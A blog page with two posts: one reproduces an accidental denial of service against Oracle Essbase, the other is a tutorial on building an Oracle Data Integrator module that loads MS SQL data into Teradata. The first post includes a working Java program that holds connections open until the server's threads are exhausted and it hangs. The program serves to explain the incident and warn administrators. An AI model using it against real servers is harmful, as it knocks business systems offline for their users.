Monday, May 9, 2016

Accidental DoS attack on Hyperion Essbase Server


 Introduction

One morning the Hyperion developers started complaining about Essbase: Hyperion services could not connect to Essbase (including the EAS console). Every attempt hung the client, and we had to kill the process through Task Manager. We stopped the Essbase service and started it again, and then everything worked fine. But what had happened to Essbase???


Accidental DoS attack

(The bug applies to Hyperion Essbase 11.1.2.3.500+ and 11.1.2.4.0+) 
     In my opinion, the developers of Hyperion EPM products don't worry much about external security, because the products are mostly used in private corporate networks. That is why they still allow old versions of the JDK, application servers and other services: nobody is expected to hack Hyperion EPM inside a private corporate network. 
     But... back to our Essbase incident. First I checked the Essbase logs and noticed something interesting:

(Screenshot: Essbase application log with multiple non-secure connection attempts)

The log showed multiple non-secure connections made directly to the Essbase application process (ESSSVR). I was sure these connections were what hung the Essbase server. The number of connections equaled the SERVERTHREADS parameter from ESSBASE.cfg. The "DoS attack" turned out to be a security scanner that our security team uses to scan the internal network.
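The limit comes from ESSBASE.cfg; a minimal illustrative fragment (the value here is an example, not our real setting):

SERVERTHREADS 20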

How to reproduce this issue?


Let's look at an Essbase application; it has 3 open ports:

(Screenshot: the ESSSVR application process listening on three ports - 32786, 32787 and 32788 in our example)

Each port can accept only SERVERTHREADS connections.
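On Linux you can see which ports an ESSSVR process has opened with something like:

netstat -ltnp | grep ESSSVR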

To reproduce the issue, I wrote a simple Java program:

import java.io.PrintWriter;
import java.net.Socket;

public class EssbaseDoSConnector {
    public static void main(String[] args) {
        if (args.length != 4) {
            System.out.println("USAGE: HOST BEGIN_PORT END_PORT NUMBER_OF_SESSIONS");
            return;
        }
        String hostName = args[0];
        int startPort = Integer.parseInt(args[1]);
        int endPort = Integer.parseInt(args[2]);
        int sessionNumber = Integer.parseInt(args[3]); // sessions to open per port
        int cnt = 0;
        for (int port = startPort; port <= endPort; port++) {
            for (int j = 0; j < sessionNumber; j++) {
                try {
                    System.out.println("connecting to port " + port);
                    // the socket is intentionally never closed:
                    // every open connection occupies one Essbase server thread
                    Socket socket = new Socket(hostName, port);
                    cnt++;
                    PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
                    // println (unlike write) triggers the auto-flush,
                    // so the test data is actually sent
                    out.println("TEST MESSAGE");
                    out.println("TEST MESSAGE");
                    out.println("TEST MESSAGE");
                    out.println("TEST MESSAGE");
                } catch (Exception e) {
                    System.out.println("Error connecting to port " + port + ": " + e.getMessage());
                }
            }
        }
        System.out.println("FINISH - number of successful connections: " + cnt);
    }
}

Compilation is very simple:
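Assuming the source is saved as EssbaseDoSConnector.java:

javac EssbaseDoSConnector.java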


It takes 4 parameters:
HOST - Essbase server name
BEGIN_PORT - first port of the Essbase application (32786 in our example)
END_PORT - last port of the Essbase application (32788 in our example)
NUMBER_OF_SESSIONS - the number of server threads from essbase.cfg

Let's try:
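A sample invocation (the host name is a placeholder, and 20 stands for your SERVERTHREADS value):

java EssbaseDoSConnector essbase-host 32786 32788 20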

(Screenshot: program output - connections are accepted until the thread limit is reached)

At first sight, nothing critical happened: the thread limit was reached, and then Essbase closed the sessions.

Try again:


(Screenshot: output of the second run)

The same result, but now the Essbase application can't accept new incoming connections, and after a while all applications become inaccessible....



We had to restart the Essbase server to repair it....

P.S.

Nobody actually wanted to attack the Essbase server ) it was a standard security check that hung all our Essbase servers.
Be careful with security scanners. Metalink contains several documents about similar issues, but they didn't help us, so administrators have to watch out for this themselves, because it can be critical for the Essbase server and its data.

Good luck )

Monday, May 2, 2016

Oracle Data Integrator: Creating a custom LKM for different DBs (MS SQL to TERADATA)


   Three months have passed since the last post. I have many ideas but no time, because of my job, where I'm developing an interesting project (as a Java developer), and in parallel I studied a machine learning course on coursera.org (I learned many useful things and improved my Python skills).

 

 Introduction


    Now I'm going to talk about Oracle Data Integrator, specifically about customizing an LKM. Moving data between different RDBMSs is one of the main tasks for a data integrator. ODI ships with many knowledge modules out of the box, but they can't cover every need. For example, six months ago I had to load data from MS SQL to Teradata. If the tables are small, you can use the standard LKM SQL to SQL, but a table with millions of rows is a problem, because this LKM is very slow. The module's own description warns about it:
Restrictions:
- This Knowledge Module is NOT RECOMMENDED when using LARGE VOLUMES. Other specific modules using Bulk utilities (SQL)
   Obviously, we have to use modules that rely on bulk utilities. 

 

Background

 

Goal


So, we need a knowledge module that uses bulk utilities on both sides (source and target). In our case these are BCP for MS SQL and TBUILD for Teradata: the first utility exports the data, and the second one loads it into the target system.
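Conceptually the whole flow is two command-line calls; a hedged sketch with placeholder names (paths, server, credentials and separators are illustrative):

bcp "SELECT col1, col2 FROM dbo.src_table" queryout /tmp/data.bcp -c -t"|" -S mssql_host -U odi_user -P secret
tbuild -f /tmp/load.script odi_job

The first call exports the query result into a delimited file; the second one runs a TPT script that reads this file and loads it into a Teradata staging table.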

 

Implementation


We can take two knowledge modules and merge them into one. Let's take:
LKM MSSQL to MSSQL (BCP) - the base module for the source side
LKM SQL to TERADATA (TTU) - for the target side


The first module uses the standard BCP utility for bulk export, therefore we take only the part that exports the data to a file.
From the second LKM we take many commands; let's see the result (the merged module):

LEGEND
YELLOW - commands from LKM MSSQL to MSSQL (BCP)
RED - commands from LKM SQL to TERADATA (TTU)
GREEN - custom commands

And we have to merge the options too:


But that's not the end; the LKM needs deeper customization.

1. Exporting data from SQL Server to a file
The BCP export must be in a format that the Teradata TTU import utility can read directly; this avoids an unnecessary file transformation step.
The original task, BCP out data to temporary bcp file, looks like this:

<%=snpRef.getUserExit("CMD_SHELL")%> "<%=snpRef.getUserExit("BCP_DIRECTORY")%>/bcp" <%=snpRef.getInfo("SRC_WORK_CATALOG")%>.<%=snpRef.getInfo("SRC_WORK_SCHEMA")%>.<%=snpRef.getInfo("COLL_NAME")%>_V out <%=snpRef.getUserExit("DEFAULT_DIRECTORY")%>/X<%=snpRef.getSession("SESS_NO")%>.bcp <%  
if (odiRef.getUserExit("UNICODE_SUPPORT").equals("1")) 
  out.print(" -w ");
else
  out.print(" -c ");
%> -S<%=snpRef.getInfo("SRC_DSERV_NAME")%> -U<%=snpRef.getInfo("SRC_USER_NAME")%> -P<%=odiRef.getInfo("SRC_PASS")%> > <%=snpRef.getUserExit("DEFAULT_DIRECTORY")%>/X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.out.log 
It exports a whole table, but I had limited permissions (I couldn't create a view or table on the source server), and I only needed a few filtered columns...

Therefore I modified the code to use a query (BCP's queryout mode) instead of a table name. Note that BCP is a command-line utility, so all newline characters have to be removed from the generated query with .replaceAll("\n", " "). The new step looks like this:


OdiOSCommand -ERR_FILE=<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.out.err  -OUT_FILE=<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.out.log 
<% path=odiRef.getOption("BCP_PATH");
if (path.length()>0) 
  out.print(path+"/bcp ");
else
  out.print("bcp ");
query=("select "+odiRef.getPop("DISTINCT_ROWS")+ odiRef.getColList("", "[EXPRESSION]\t[ALIAS_SEP] [CX_COL_NAME]", ",", "", "")+" from "+odiRef.getFrom()+" where (1=1) "+ odiRef.getFilter()+odiRef.getJrnFilter()+odiRef.getJoin()+odiRef.getGrpBy()+odiRef.getHaving()).replaceAll("\n"," ");



%>  "<% out.print(query); %>"  queryout <?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.bcp  <%  
if (odiRef.getUserExit("UNICODE_SUPPORT").equals("1")) 
  out.print(" -w ");
else
  out.print(" -c ");
%> <%  
if (!odiRef.getUserExit("BCP_LOCAL_SERVER").equals("1")) 
  out.print(" -S"+odiRef.getInfo("SRC_DSERV_NAME"));
%> -U<%=odiRef.getInfo("SRC_USER_NAME")%> -P"<%=odiRef.getInfo("SRC_PASS")%>"  <%
terminator=odiRef.getOption("FIELD_SEPARATOR");
 if (terminator.length()>0) {
    if (terminator.equals("' '")) 
      out.print(" -t"+(char)34+" "+(char)34);
    else
      out.print(" -t"+terminator);
} 
%>  <% recordTerminator=odiRef.getUserExit("RECORD_SEPARATOR");
 if (recordTerminator.length() > 0) 
  out.print(" -r" +  recordTerminator);
%> -C1251


Note that we use the same FIELD_SEPARATOR and RECORD_SEPARATOR in both utilities.
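For example, with FIELD_SEPARATOR set to '|' both sides must agree (an illustration, not the exact generated text):

bcp ... -t"|" ...                      (field terminator on the export side)
VARCHAR TextDelimiter = '|',           (DataConnector attribute in the TPT script)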
The result of this stage is a *.bcp file with the data; next we have to load it into Teradata.


2. Loading data from the file into Teradata using TBUILD
LKM File to Teradata (TTU) supports several utilities: FASTLOAD, MLOAD, TPUMP, TPT-LOAD and TPT-SQL-INSERT.

I used TPT-LOAD, because I didn't modify the code to support all of the utilities.
First we have to generate a script for the TPT-LOAD utility; this is the Generate ttu script stage.


OdiOutFile "-File=<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.script"
<% if (odiRef.getOption("TERADATA_UTILITY").startsWith("TPT")) { 
/********************************************************************************/ 
/* Parallel Transporter Script    */ 
/********************************************************************************/ %>
DEFINE JOB ODILoad<%=odiRef.getStep("SESS_NO")%>
DESCRIPTION 'ODI step name: <%=odiRef.getStep("STEP_NAME")%> ODI step #:<%=odiRef.getStep("NNO")%> from session #<%=odiRef.getStep("SESS_NO")%>'
(
DEFINE SCHEMA StagingTable
DESCRIPTION 'Staging table for <%=odiRef.getTable("L", "TARG_NAME", "D")%>'
(
<%=odiRef.getColList("", "\t[CX_COL_NAME]\t"+
 /* Is this a date? Then we need to translate into ANSIDATE type */
 "<? if (\u0022[DEST_DT]\u0022.equals(\u0022DATE\u0022)) { ?>"+
  "ANSIDATE"+
 /* otherwise use standard data type */
 "<? } else { ?>"+
  "[DEST_WRI_DT]"+
 "<?};?> "+ odiRef.getInfo("DEST_DDL_NULL"),  
 ",\n", "","")%>
);
DEFINE SCHEMA SourceFile
DESCRIPTION 'Staging table for <%=odiRef.getTable("L", "TARG_NAME", "D")%>'
(
<%=odiRef.getColList("", "\t[CX_COL_NAME]\t"+
 /* Is this a date or timestamp field? Then we set the buffer length independent of LONGC */
 "<? if (\u0022[DEST_DT]\u0022.equals(\u0022DATE\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0)\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP() WITH TIME ZONE\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0)\u0022))  {?>"+
  "VARCHAR(21)"+
 "<?} else ?>"+
 /* Is this a numeric field? Then we add +2 to the length to include potential sign and decimal separator. */
 "<? if (\u0022[DEST_DT]\u0022.equals(\u0022BIGINT\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022BYTE\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022BYTEINT\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022DECIMAL\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022DOUBLE PRECISION\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022FLOAT\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022INTEGER\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022NUMERIC\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022REAL\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022SMALLINT\u0022))  {?>"+
  "VARCHAR(<?=(new Integer([LONGC]+2)).toString()?>)"+
 "<? } else {      ?>"+
  "VARCHAR([LONGC])"+
 "<?};?>"+
 "", ",\n", "","")%>
);

DEFINE OPERATOR FileReader
DESCRIPTION 'Read File Using DataConnector'
TYPE DATACONNECTOR PRODUCER
SCHEMA SourceFile
ATTRIBUTES
(
 VARCHAR PrivateLogName,
 VARCHAR FileName = '<% out.print( odiRef.getOption("DEFAULT_DIRECTORY")+"\/X");%><%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.bcp', /*Name of the file read from or written to*/
 VARCHAR OpenMode = 'Read', /*How to open the file: read, write, or writeappend*/
 VARCHAR Format = 'delimited', 
 VARCHAR TextDelimiter = '<%=odiRef.getOption("FIELD_SEPARATOR")%>',
 VARCHAR IndicatorMode = 'N', /*Whether indicator bytes are used in the operation*/
 INTEGER RowsPerInstance,
 INTEGER VigilWaitTime,
 VARCHAR VigilStartTime,
 VARCHAR VigilStopTime,
 VARCHAR VigilNoticeFileName,
 VARCHAR TraceLevel = 'none'
);

<% if (odiRef.getOption("TERADATA_UTILITY").equals("TPT-LOAD")) { %>
DEFINE OPERATOR LoadStagingTable
TYPE LOAD
SCHEMA *
ATTRIBUTES
(
 INTEGER MaxSessions = <%=odiRef.getOption("SESSIONS")%>,
 <% if ((new java.lang.Integer(odiRef.getOption("MAX_ALLOWED_ERRORS"))).longValue()>0) {%>INTEGER ErrorLimit = <%=odiRef.getOption("MAX_ALLOWED_ERRORS")%>,<%}; %>
 VARCHAR UserName = '<%=odiRef.getInfo("DEST_USER_NAME")%>',
 VARCHAR UserPassword = '<%=odiRef.getInfo("DEST_PASS")%>',
 VARCHAR LogTable = '<%=odiRef.getTable("L", "COLL_NAME", "W").replaceAll("<.=","<?s=").replaceAll("..>",".replaceAll((char)92+\\u0022.\\u0022,\\u0022.LOG_\\u0022); out.print(s.substring(0,s.indexOf(\\u0022.\\u0022)+1+java.lang.Math.min(s.length()-s.indexOf(\\u0022.\\u0022)-1,"+ odiRef.getInfo("DEST_MAX_TAB_NAME_LEN") +")));?>")%>',
 VARCHAR TargetTable = '<%=odiRef.getTable("L", "COLL_NAME", "W")%>T',
 VARCHAR ErrorTable1 = '<%=odiRef.getTable("L", "COLL_NAME", "W").replaceAll("<.=","<?s=").replaceAll("..>",".replaceAll((char)92+\\u0022.\\u0022,\\u0022.ET_\\u0022); out.print(s.substring(0,s.indexOf(\\u0022.\\u0022)+1+java.lang.Math.min(s.length()-s.indexOf(\\u0022.\\u0022)-1,"+ odiRef.getInfo("DEST_MAX_TAB_NAME_LEN") +")));?>")%>',
 VARCHAR ErrorTable2 = '<%=odiRef.getTable("L", "COLL_NAME", "W").replaceAll("<.=","<?s=").replaceAll("..>",".replaceAll((char)92+\\u0022.\\u0022,\\u0022.UV_\\u0022); out.print(s.substring(0,s.indexOf(\\u0022.\\u0022)+1+java.lang.Math.min(s.length()-s.indexOf(\\u0022.\\u0022)-1,"+ odiRef.getInfo("DEST_MAX_TAB_NAME_LEN") +")));?>")%>',
 VARCHAR PauseAcq,
 VARCHAR PrivateLogName,
 VARCHAR TdpId ='<%=odiRef.getInfo("DEST_DSERV_NAME")%>'
);
<% }; if (odiRef.getOption("TERADATA_UTILITY").equals("TPT-SQL-INSERT")) { %>
DEFINE OPERATOR LoadStagingTable
TYPE INSERTER
SCHEMA *
ATTRIBUTES
(
 VARCHAR UserName = '<%=odiRef.getInfo("DEST_USER_NAME")%>',
 VARCHAR UserPassword ='<%=odiRef.getInfo("DEST_PASS")%>',
 VARCHAR PrivateLogName,
 VARCHAR TdpId ='<%=odiRef.getInfo("DEST_DSERV_NAME")%>'
);
<%}%>

APPLY
(
 'INSERT INTO <%=odiRef.getTable("L", "COLL_NAME", "W")%>T
 (
 <%=odiRef.getColList("", "\t[CX_COL_NAME]", ",\n\t", "","")%>
 )
 VALUES 
 (
  <%=odiRef.getColList("", ":[CX_COL_NAME]"+
  /* Is this a date or timestamp field? Then apply teradata cast. */
  "<? if (\u0022[DEST_DT]\u0022.equals(\u0022DATE\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0)\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP() WITH TIME ZONE\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0) WITH TIME ZONE\u0022))  {?>"+
  "\t(TIMESTAMP(3), FORMAT ''YYYYMMDDHHMISS.S(3)'')"+
  "<? };?>"
  , ",\n\t\t", "","")%>
 );'
)
TO OPERATOR 
(
 LoadStagingTable[1]
)
 SELECT 
 <%=odiRef.getColList("", "\t[CX_COL_NAME]", ",\n\t", "", "")%>
 FROM OPERATOR(FileReader[1]); 
);

<%}%>

This script reads the exported BCP file and loads it into the work table on the target system; I made only minimal changes to the Generate ttu script stage.
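By the way, the generated script can be tested outside of ODI by calling tbuild directly (the file name is illustrative):

tbuild -f X123456.script tdJob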

The next stage is Load to staging area. This part is very important, because it runs the tbuild utility with the script we built in the previous step.

from jarray  import array
from java.lang  import Thread
from java.io  import BufferedOutputStream
from java.io  import PrintStream
from java.lang import String
from java.lang  import Runtime
from java.lang  import System
from java.io   import StringWriter
from java.io   import InputStreamReader
from java.io   import OutputStreamWriter
from java.io   import BufferedReader
from java.io   import BufferedWriter
from java.io   import FileReader
from java.io   import FileWriter
from jarray   import zeros
import com.sunopsis.dwg.tools.SqlUnload as JSnpsSqlUnload
import java.util.Vector as JVector
import threading
import time
import os
from datetime import datetime

#
# Source connection variables
#
srcdriver = "<%=odiRef.getInfo("SRC_JAVA_DRIVER")%>"
srcurl = "<%=odiRef.getInfo("SRC_JAVA_URL")%>"
srcuser = "<%=odiRef.getInfo("SRC_USER_NAME")%>"
srcpass = "<%=odiRef.getInfo("SRC_ENCODED_PASS")%>"
fetchsize = "<%=odiRef.getInfo("SRC_FETCH_ARRAY")%>"
LOG_FILE_NAME='<%=odiRef.getOption("LOG_FILE")%>' 
#
# Temporary Files variables
#
filename = r"<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.%s"                               
#"<%=odiRef.getOption("DEFAULT_DIRECTORY")%>/<%=odiRef.getTable("L", "TARG_NAME", "W")%>_<%=odiRef.getInfo("SRC_SET_NAME")%>.%s"
logname = filename % "log"
scriptname = filename % "script"
outname   = filename % "out"
dataname = r"<% 
  out.print( odiRef.getOption("DEFAULT_DIRECTORY")+"/"+odiRef.getTable("L", "TARG_NAME", "W")+"_"+odiRef.getInfo("SRC_SET_NAME")+".data" );
 %>" 

#
# Unload Options
#
fieldsep = "<%=odiRef.getOption("FIELD_SEPARATOR")%>"
datefmt = "yyyyMMddHHmmss.SSS"
# query has already been defined in previous step

#
# Load Options
#
loadcmd = r"""<% 
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "FASTLOAD" )) { %>fastload < "%s" > "%s"<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "MLOAD" ))  { %>mload < "%s" > "%s"<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "TPUMP" ))   { %>tpump < "%s" > "%s"<% } else
       { %>tbuild -f "%s" tdjob<%};%> """
loadcmd = loadcmd % (scriptname)
utility = r"""<% 
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "FASTLOAD" )) { %>fastload<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "MLOAD" ))  { %>mload<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "TPUMP" ))   { %>tpump<% } else
       { %>tbuild -f %s <%};%> """ <%
 if (odiRef.getOption( "TERADATA_UTILITY" ).startsWith( "TPT" ))  { %> % (scriptname)<%};%>

lf = None

class Gobbler(Thread):
 def __init__(self, stream, label):
  self.br = BufferedReader(InputStreamReader(stream))
  self.label = label
 def run(self):
  line=self.br.readLine()
  while (line != None):
   print >> lf, self.label + line
   line=self.br.readLine()
  #print >>lf, "ODI: End of polling of " + self.label


class Writer(Thread):
 def __init__(self, stream):
  self.ps = PrintStream(BufferedOutputStream(stream))
 def run(self):
  fsrc = open(r"<%=odiRef.getOption("DEFAULT_DIRECTORY")%>/<%=odiRef.getTable("L", "TARG_NAME", "W")%>_<%=odiRef.getInfo("SRC_SET_NAME")%>.script", 'r') 
  try:
   for lsrc in fsrc.readlines():
    self.ps.println(lsrc)
  finally:
   fsrc.close()
  self.ps.flush()
  self.ps.close()


#write log to file 
def write_log(strlog):
    logfile=open(LOG_FILE_NAME, "a")
    strtime=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+':'+strlog
    strtime=strtime+'\n'
    logfile.write(strtime)
    logfile.close()
    print strtime
#===========================
# load()
# executes the file-based load
#===========================
def load():
    write_log('Run load into teradata '+loadcmd)
    #ok status
    error_result=0
    try:
        out,err,status = run_process()
        write_log (' output='+out +'\n error='+err+'\n status='+str(status))
        if status!=0:
            write_log ('ERROR status='+str(status))
            error_result=1
        else:
            write_log ('Status OK')
        
    except Exception,ex:
        err=str(ex)
        write_log ('Error running command '+ loadcmd+'\n'+err)
        error_result=1
    #if error rise
    if(error_result==1):
        raise Exception(error_result,err)   
def run_process():
    #run the console process and return its output
    #Return (process output, error output, status code)
    import subprocess
    loadcmd = r"""tbuild -f %s tdJob""" % (scriptname)
    p = subprocess.Popen(loadcmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    #communicate() reads both streams and waits until the process finishes
    out, err = p.communicate()
    #process return code
    status = p.returncode
    return out, err, status
 
#snpssqlunload()
load()

I rewrote the load procedure and added the run_process function. The standard load() procedure uses the os.system function to run tbuild, but I used the subprocess module instead, because it allows reading the console output, which I can then write into the log file:
        out,err,status = run_process()
        write_log (' output='+out +'\n error='+err+'\n status='+str(status))
        if status!=0:
            write_log ('ERROR status='+str(status))
            error_result=1
        else:
            write_log ('Status OK')

Having the output in the log file helps to debug errors that occur during the load stage.

Verification
A few words about the custom stages Calculate number of exported rows and Verify results.
These stages verify that the numbers of exported and imported rows are equal. You could make these steps optional (but I worry about losing data, so I always use them).
Calculate number of exported rows (pre-integration step) - counts the rows in the export file
Verify results (post-integration step) - counts the rows in the target
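A hedged sketch of the idea behind these checks (names are placeholders; counting lines only works when the record separator is a newline):

wc -l < X123456.bcp                    (rows in the export file)
SELECT COUNT(*) FROM work_table;       (rows loaded into the Teradata work table)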

 

Results


Let's try the new LKM MS SQL to TERADATA knowledge module.
Test data:
Source Microsoft SQL table size: approximately 70 000 000 rows
BCP file size: approximately 7 GB
Execution time: 4001 seconds
Our new module loaded 70 000 000 rows into the target Teradata table in 4001 seconds (roughly 17 500 rows per second) - not a bad result!
I compared it with the standard LKM SQL to SQL on the same source table of approximately 70 000 000 rows.
I waited for 10 000 seconds... and then aborted the session, because in that time it had loaded only 146 000 rows into the work table. A simple calculation: at about 15 rows per second we would need roughly 4 800 000 seconds (around 55 days) to load 70 million rows. Not fast, is it?

Conclusion

   ODI gives us powerful integration tools and many knowledge modules, but they are only pieces of a puzzle whose full picture is our integration solution. As you can see, it is not hard to create custom knowledge modules for flows between databases that the standard LKMs don't cover: we can merge existing modules and reuse them. The result saves time and increases the performance of the integration solution.